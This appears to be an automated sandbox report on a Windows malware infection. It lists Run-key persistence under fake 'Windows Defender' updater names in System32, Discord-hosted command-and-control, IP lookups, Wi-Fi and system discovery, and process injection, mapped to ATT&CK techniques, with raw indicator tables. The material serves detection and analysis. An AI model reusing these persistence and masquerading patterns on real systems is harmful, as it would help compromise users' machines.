Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 12 IoCs

Web Service

T1102

flow	ioc
180	discord.com
26	raw.githubusercontent.com
27	raw.githubusercontent.com
61	discord.com
81	discord.com
139	discord.com
140	discord.com
168	discord.com
181	discord.com
60	discord.com
80	discord.com
169	discord.com

Looks up external IP address via web service 8 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
78	ip-api.com
91	ip-api.com
116	ip-api.com
132	ip-api.com
166	ip-api.com
178	ip-api.com
30	ip-api.com
55	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\java.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\java.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\java.exe	cmd.exe
File opened for modification	C:\Windows\system32\java.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\SubDir\x.exe	x.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\SubDir\x.exe	x.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe

Enumerates processes with tasklist 1 TTPs 25 IoCs

discovery

Process Discovery

T1057

pid	Process
5636	Process not Found
996	Process not Found
6080	tasklist.exe
736	tasklist.exe
3492	tasklist.exe
4300	tasklist.exe
5872	tasklist.exe
4900	Process not Found
5324	tasklist.exe
4692	tasklist.exe
1276	tasklist.exe
5476	tasklist.exe
5972	tasklist.exe
5148	tasklist.exe
5388	tasklist.exe
700	Process not Found
940	tasklist.exe
5780	tasklist.exe
2640	tasklist.exe
5468	tasklist.exe
1536	tasklist.exe
3452	tasklist.exe
2764	tasklist.exe
1588	tasklist.exe
3544	tasklist.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/files/0x0008000000023bfc-161.dat	upx
behavioral4/memory/3108-168-0x00007FFE52820000-0x00007FFE52C85000-memory.dmp	upx
behavioral4/files/0x0008000000023bcc-173.dat	upx
behavioral4/files/0x000a000000023b7c-172.dat	upx
behavioral4/memory/3108-210-0x00007FFE685D0000-0x00007FFE685DF000-memory.dmp	upx
behavioral4/memory/3108-209-0x00007FFE59610000-0x00007FFE59634000-memory.dmp	upx
behavioral4/memory/3108-224-0x00007FFE583E0000-0x00007FFE58551000-memory.dmp	upx
behavioral4/memory/3108-227-0x00007FFE58ED0000-0x00007FFE58EFE000-memory.dmp	upx
behavioral4/memory/3108-232-0x00007FFE52380000-0x00007FFE52498000-memory.dmp	upx
behavioral4/memory/3108-231-0x00007FFE682C0000-0x00007FFE682CD000-memory.dmp	upx
behavioral4/memory/3108-230-0x00007FFE58C80000-0x00007FFE58C95000-memory.dmp	upx
behavioral4/memory/3108-228-0x00007FFE524A0000-0x00007FFE52817000-memory.dmp	upx
behavioral4/memory/3108-226-0x00007FFE68390000-0x00007FFE6839D000-memory.dmp	upx
behavioral4/memory/3108-225-0x00007FFE58F00000-0x00007FFE58F19000-memory.dmp	upx
behavioral4/memory/3108-229-0x00007FFE58320000-0x00007FFE583D7000-memory.dmp	upx
behavioral4/memory/3108-223-0x00007FFE5EA70000-0x00007FFE5EA8E000-memory.dmp	upx
behavioral4/memory/3108-222-0x00007FFE5F160000-0x00007FFE5F178000-memory.dmp	upx
behavioral4/memory/3108-221-0x00007FFE58F20000-0x00007FFE58F4C000-memory.dmp	upx
behavioral4/memory/3108-234-0x00007FFE52820000-0x00007FFE52C85000-memory.dmp	upx
behavioral4/memory/3108-257-0x00007FFE59610000-0x00007FFE59634000-memory.dmp	upx
behavioral4/memory/3744-324-0x00007FFE4FFF0000-0x00007FFE50455000-memory.dmp	upx
behavioral4/memory/3108-331-0x00007FFE524A0000-0x00007FFE52817000-memory.dmp	upx
behavioral4/memory/3744-330-0x00007FFE68240000-0x00007FFE6824F000-memory.dmp	upx
behavioral4/memory/3744-329-0x00007FFE52040000-0x00007FFE52064000-memory.dmp	upx
behavioral4/memory/3108-328-0x00007FFE583E0000-0x00007FFE58551000-memory.dmp	upx
behavioral4/memory/3108-327-0x00007FFE5EA70000-0x00007FFE5EA8E000-memory.dmp	upx
behavioral4/memory/3744-341-0x00007FFE51FD0000-0x00007FFE51FEE000-memory.dmp	upx
behavioral4/memory/3744-340-0x00007FFE51FF0000-0x00007FFE52008000-memory.dmp	upx
behavioral4/memory/3108-339-0x00007FFE58320000-0x00007FFE583D7000-memory.dmp	upx
behavioral4/memory/3744-338-0x00007FFE52010000-0x00007FFE5203C000-memory.dmp	upx
behavioral4/memory/3108-337-0x00007FFE58ED0000-0x00007FFE58EFE000-memory.dmp	upx
behavioral4/memory/3108-336-0x00007FFE58F00000-0x00007FFE58F19000-memory.dmp	upx
behavioral4/memory/3744-342-0x00007FFE51750000-0x00007FFE518C1000-memory.dmp	upx
behavioral4/memory/3744-343-0x00007FFE51FB0000-0x00007FFE51FC9000-memory.dmp	upx
behavioral4/memory/3744-346-0x00007FFE4FFF0000-0x00007FFE50455000-memory.dmp	upx
behavioral4/memory/3744-347-0x00007FFE51690000-0x00007FFE51747000-memory.dmp	upx
behavioral4/memory/3744-350-0x00007FFE52040000-0x00007FFE52064000-memory.dmp	upx
behavioral4/memory/3744-353-0x00007FFE67AB0000-0x00007FFE67ABD000-memory.dmp	upx
behavioral4/memory/3744-352-0x00007FFE51F90000-0x00007FFE51FA5000-memory.dmp	upx
behavioral4/memory/3744-348-0x00007FFE4F880000-0x00007FFE4FBF7000-memory.dmp	upx
behavioral4/memory/3744-345-0x00007FFE51F40000-0x00007FFE51F6E000-memory.dmp	upx
behavioral4/memory/3744-344-0x00007FFE67BA0000-0x00007FFE67BAD000-memory.dmp	upx
behavioral4/memory/3744-382-0x00007FFE51690000-0x00007FFE51747000-memory.dmp	upx
behavioral4/memory/3744-381-0x00007FFE51F40000-0x00007FFE51F6E000-memory.dmp	upx
behavioral4/memory/3744-380-0x00007FFE67BA0000-0x00007FFE67BAD000-memory.dmp	upx
behavioral4/memory/3744-379-0x00007FFE51FB0000-0x00007FFE51FC9000-memory.dmp	upx
behavioral4/memory/3744-378-0x00007FFE51750000-0x00007FFE518C1000-memory.dmp	upx
behavioral4/memory/3744-377-0x00007FFE51FD0000-0x00007FFE51FEE000-memory.dmp	upx
behavioral4/memory/3744-376-0x00007FFE52010000-0x00007FFE5203C000-memory.dmp	upx
behavioral4/memory/3744-375-0x00007FFE68240000-0x00007FFE6824F000-memory.dmp	upx
behavioral4/memory/3744-374-0x00007FFE52040000-0x00007FFE52064000-memory.dmp	upx
behavioral4/memory/3744-373-0x00007FFE4FFF0000-0x00007FFE50455000-memory.dmp	upx
behavioral4/memory/3744-369-0x00007FFE4F880000-0x00007FFE4FBF7000-memory.dmp	upx
behavioral4/memory/3744-372-0x00007FFE51FF0000-0x00007FFE52008000-memory.dmp	upx
behavioral4/memory/3744-371-0x00007FFE67AB0000-0x00007FFE67ABD000-memory.dmp	upx
behavioral4/memory/3744-370-0x00007FFE51F90000-0x00007FFE51FA5000-memory.dmp	upx
behavioral4/memory/5292-507-0x00007FFE4E620000-0x00007FFE4EA85000-memory.dmp	upx
behavioral4/memory/5292-514-0x00007FFE51EB0000-0x00007FFE51ED4000-memory.dmp	upx
behavioral4/memory/5292-515-0x00007FFE67AB0000-0x00007FFE67ABF000-memory.dmp	upx
behavioral4/memory/5292-522-0x00007FFE51E90000-0x00007FFE51EA8000-memory.dmp	upx
behavioral4/memory/5292-524-0x00007FFE50FB0000-0x00007FFE51121000-memory.dmp	upx
behavioral4/memory/5292-523-0x00007FFE51A00000-0x00007FFE51A1E000-memory.dmp	upx
behavioral4/memory/5292-525-0x00007FFE51710000-0x00007FFE51729000-memory.dmp	upx
behavioral4/memory/5292-521-0x00007FFE51F10000-0x00007FFE51F3C000-memory.dmp	upx

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2528	Process not Found
4484	Process not Found

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jtkhikadjthsad.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	onetap.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	LummaC22222.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jerniuiopu.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 10 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1568	netsh.exe
2852	netsh.exe
2516	cmd.exe
5880	Process not Found
408	cmd.exe
840	cmd.exe
4372	netsh.exe
4952	cmd.exe
4948	netsh.exe
5556	Process not Found

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	jtkhikadjthsad.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	jtkhikadjthsad.exe

Delays execution with timeout.exe 64 IoCs

evasion

pid	Process
5940	timeout.exe
5684	timeout.exe
1016	timeout.exe
5952	timeout.exe
5160	timeout.exe
3452	timeout.exe
2272	timeout.exe
1128	timeout.exe
5880	timeout.exe
4068	timeout.exe
5552	timeout.exe
5516	timeout.exe
3000	timeout.exe
2972	timeout.exe
3348	timeout.exe
5272	timeout.exe
5336	timeout.exe
4848	timeout.exe
1516	Process not Found
1016	timeout.exe
1136	timeout.exe
5504	timeout.exe
1300	timeout.exe
5564	timeout.exe
5872	timeout.exe
6092	timeout.exe
4184	timeout.exe
3852	timeout.exe
5504	timeout.exe
3584	Process not Found
5708	timeout.exe
4620	Process not Found
5644	timeout.exe
1256	timeout.exe
392	timeout.exe
4204	timeout.exe
1016	timeout.exe
908	timeout.exe
5724	timeout.exe
6032	timeout.exe
4188	Process not Found
1744	timeout.exe
3912	Process not Found
3708	timeout.exe
4832	timeout.exe
5872	timeout.exe
3056	timeout.exe
1768	timeout.exe
2256	timeout.exe
844	Process not Found
5460	timeout.exe
5232	timeout.exe
5660	timeout.exe
6116	timeout.exe
380	timeout.exe
5852	timeout.exe
400	timeout.exe
6000	timeout.exe
3056	timeout.exe
5268	timeout.exe
3096	timeout.exe
2560	timeout.exe
5280	Process not Found
5740	Process not Found

Detects videocard installed 1 TTPs 15 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5768	Process not Found
5428	WMIC.exe
6100	WMIC.exe
6052	Process not Found
2820	WMIC.exe
4888	WMIC.exe
5504	WMIC.exe
744	WMIC.exe
3348	WMIC.exe
5840	WMIC.exe
2072	WMIC.exe
3160	Process not Found
5976	WMIC.exe
4368	WMIC.exe
5992	WMIC.exe

Gathers system information 1 TTPs 5 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4304	systeminfo.exe
1464	systeminfo.exe
3188	systeminfo.exe
3736	systeminfo.exe
5552	Process not Found

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
4124	Process not Found

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5012	schtasks.exe
1580	schtasks.exe
1700	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2684	powershell.exe
2684	powershell.exe
3328	powershell.exe
3328	powershell.exe
2684	powershell.exe
3328	powershell.exe
2480	powershell.exe
2480	powershell.exe
1552	powershell.exe
1552	powershell.exe
2480	powershell.exe
1552	powershell.exe
5896	powershell.exe
5896	powershell.exe
5896	powershell.exe
5696	powershell.exe
5696	powershell.exe
5696	powershell.exe
2436	powershell.exe
2436	powershell.exe
2436	powershell.exe
3096	powershell.exe
3096	powershell.exe
3096	powershell.exe
5972	powershell.exe
5972	powershell.exe
4512	powershell.exe
4512	powershell.exe
4512	powershell.exe
5972	powershell.exe
5804	powershell.exe
5804	powershell.exe
5804	powershell.exe
1576	powershell.exe
1576	powershell.exe
1576	powershell.exe
228	powershell.exe
228	powershell.exe
228	powershell.exe
4288	powershell.exe
4288	powershell.exe
4288	powershell.exe
1100	powershell.exe
1100	powershell.exe
1100	powershell.exe
4356	powershell.exe
4356	powershell.exe
4356	powershell.exe
4288	powershell.exe
4288	powershell.exe
4288	powershell.exe
3536	powershell.exe
3536	powershell.exe
3536	powershell.exe
2248	powershell.exe
2248	powershell.exe
2248	powershell.exe
1276	powershell.exe
1276	powershell.exe
1276	powershell.exe
6052	powershell.exe
6052	powershell.exe
6052	powershell.exe
5340	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1148	4363463463464363463463463.exe
Token: SeDebugPrivilege	4736	jerniuiopu.exe
Token: SeDebugPrivilege	2888	x.exe
Token: SeDebugPrivilege	4388	WindowsDataUpdater.exe
Token: SeDebugPrivilege	2684	powershell.exe
Token: SeDebugPrivilege	3328	powershell.exe
Token: SeIncreaseQuotaPrivilege	4964	WMIC.exe
Token: SeSecurityPrivilege	4964	WMIC.exe
Token: SeTakeOwnershipPrivilege	4964	WMIC.exe
Token: SeLoadDriverPrivilege	4964	WMIC.exe
Token: SeSystemProfilePrivilege	4964	WMIC.exe
Token: SeSystemtimePrivilege	4964	WMIC.exe
Token: SeProfSingleProcessPrivilege	4964	WMIC.exe
Token: SeIncBasePriorityPrivilege	4964	WMIC.exe
Token: SeCreatePagefilePrivilege	4964	WMIC.exe
Token: SeBackupPrivilege	4964	WMIC.exe
Token: SeRestorePrivilege	4964	WMIC.exe
Token: SeShutdownPrivilege	4964	WMIC.exe
Token: SeDebugPrivilege	4964	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4964	WMIC.exe
Token: SeRemoteShutdownPrivilege	4964	WMIC.exe
Token: SeUndockPrivilege	4964	WMIC.exe
Token: SeManageVolumePrivilege	4964	WMIC.exe
Token: 33	4964	WMIC.exe
Token: 34	4964	WMIC.exe
Token: 35	4964	WMIC.exe
Token: 36	4964	WMIC.exe
Token: SeDebugPrivilege	940	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4964	WMIC.exe
Token: SeSecurityPrivilege	4964	WMIC.exe
Token: SeTakeOwnershipPrivilege	4964	WMIC.exe
Token: SeLoadDriverPrivilege	4964	WMIC.exe
Token: SeSystemProfilePrivilege	4964	WMIC.exe
Token: SeSystemtimePrivilege	4964	WMIC.exe
Token: SeProfSingleProcessPrivilege	4964	WMIC.exe
Token: SeIncBasePriorityPrivilege	4964	WMIC.exe
Token: SeCreatePagefilePrivilege	4964	WMIC.exe
Token: SeBackupPrivilege	4964	WMIC.exe
Token: SeRestorePrivilege	4964	WMIC.exe
Token: SeShutdownPrivilege	4964	WMIC.exe
Token: SeDebugPrivilege	4964	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4964	WMIC.exe
Token: SeRemoteShutdownPrivilege	4964	WMIC.exe
Token: SeUndockPrivilege	4964	WMIC.exe
Token: SeManageVolumePrivilege	4964	WMIC.exe
Token: 33	4964	WMIC.exe
Token: 34	4964	WMIC.exe
Token: 35	4964	WMIC.exe
Token: 36	4964	WMIC.exe
Token: SeDebugPrivilege	1740	WindowsDataUpdater.exe
Token: SeIncreaseQuotaPrivilege	2820	WMIC.exe
Token: SeSecurityPrivilege	2820	WMIC.exe
Token: SeTakeOwnershipPrivilege	2820	WMIC.exe
Token: SeLoadDriverPrivilege	2820	WMIC.exe
Token: SeSystemProfilePrivilege	2820	WMIC.exe
Token: SeSystemtimePrivilege	2820	WMIC.exe
Token: SeProfSingleProcessPrivilege	2820	WMIC.exe
Token: SeIncBasePriorityPrivilege	2820	WMIC.exe
Token: SeCreatePagefilePrivilege	2820	WMIC.exe
Token: SeBackupPrivilege	2820	WMIC.exe
Token: SeRestorePrivilege	2820	WMIC.exe
Token: SeShutdownPrivilege	2820	WMIC.exe
Token: SeDebugPrivilege	2820	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2820	WMIC.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
4736	jerniuiopu.exe
4388	WindowsDataUpdater.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1148 wrote to memory of 1468	1148	4363463463464363463463463.exe	84
PID 1148 wrote to memory of 1468	1148	4363463463464363463463463.exe	84
PID 1148 wrote to memory of 4420	1148	4363463463464363463463463.exe	85
PID 1148 wrote to memory of 4420	1148	4363463463464363463463463.exe	85
PID 1148 wrote to memory of 4736	1148	4363463463464363463463463.exe	86
PID 1148 wrote to memory of 4736	1148	4363463463464363463463463.exe	86
PID 1148 wrote to memory of 4736	1148	4363463463464363463463463.exe	86
PID 4736 wrote to memory of 5012	4736	jerniuiopu.exe	90
PID 4736 wrote to memory of 5012	4736	jerniuiopu.exe	90
PID 4736 wrote to memory of 5012	4736	jerniuiopu.exe	90
PID 1148 wrote to memory of 4516	1148	4363463463464363463463463.exe	92
PID 1148 wrote to memory of 4516	1148	4363463463464363463463463.exe	92
PID 4516 wrote to memory of 4252	4516	Aquarius.exe	93
PID 4516 wrote to memory of 4252	4516	Aquarius.exe	93
PID 4252 wrote to memory of 1308	4252	cmd.exe	97
PID 4252 wrote to memory of 1308	4252	cmd.exe	97
PID 1148 wrote to memory of 2888	1148	4363463463464363463463463.exe	99
PID 1148 wrote to memory of 2888	1148	4363463463464363463463463.exe	99
PID 4252 wrote to memory of 2272	4252	cmd.exe	101
PID 4252 wrote to memory of 2272	4252	cmd.exe	101
PID 4252 wrote to memory of 952	4252	cmd.exe	102
PID 4252 wrote to memory of 952	4252	cmd.exe	102
PID 4252 wrote to memory of 3536	4252	cmd.exe	103
PID 4252 wrote to memory of 3536	4252	cmd.exe	103
PID 4252 wrote to memory of 4416	4252	cmd.exe	104
PID 4252 wrote to memory of 4416	4252	cmd.exe	104
PID 4252 wrote to memory of 3164	4252	cmd.exe	105
PID 4252 wrote to memory of 3164	4252	cmd.exe	105
PID 4252 wrote to memory of 4388	4252	cmd.exe	106
PID 4252 wrote to memory of 4388	4252	cmd.exe	106
PID 3164 wrote to memory of 3108	3164	WindowsDefenderUpdater.exe	107
PID 3164 wrote to memory of 3108	3164	WindowsDefenderUpdater.exe	107
PID 4252 wrote to memory of 3460	4252	cmd.exe	108
PID 4252 wrote to memory of 3460	4252	cmd.exe	108
PID 2888 wrote to memory of 1580	2888	x.exe	109
PID 2888 wrote to memory of 1580	2888	x.exe	109
PID 4252 wrote to memory of 392	4252	cmd.exe	111
PID 4252 wrote to memory of 392	4252	cmd.exe	111
PID 3108 wrote to memory of 4304	3108	WindowsDefenderUpdater.exe	112
PID 3108 wrote to memory of 4304	3108	WindowsDefenderUpdater.exe	112
PID 3108 wrote to memory of 2324	3108	WindowsDefenderUpdater.exe	113
PID 3108 wrote to memory of 2324	3108	WindowsDefenderUpdater.exe	113
PID 3108 wrote to memory of 640	3108	WindowsDefenderUpdater.exe	114
PID 3108 wrote to memory of 640	3108	WindowsDefenderUpdater.exe	114
PID 3460 wrote to memory of 1964	3460	java.exe	115
PID 3460 wrote to memory of 1964	3460	java.exe	115
PID 3108 wrote to memory of 2260	3108	WindowsDefenderUpdater.exe	119
PID 3108 wrote to memory of 2260	3108	WindowsDefenderUpdater.exe	119
PID 4388 wrote to memory of 1700	4388	WindowsDataUpdater.exe	122
PID 4388 wrote to memory of 1700	4388	WindowsDataUpdater.exe	122
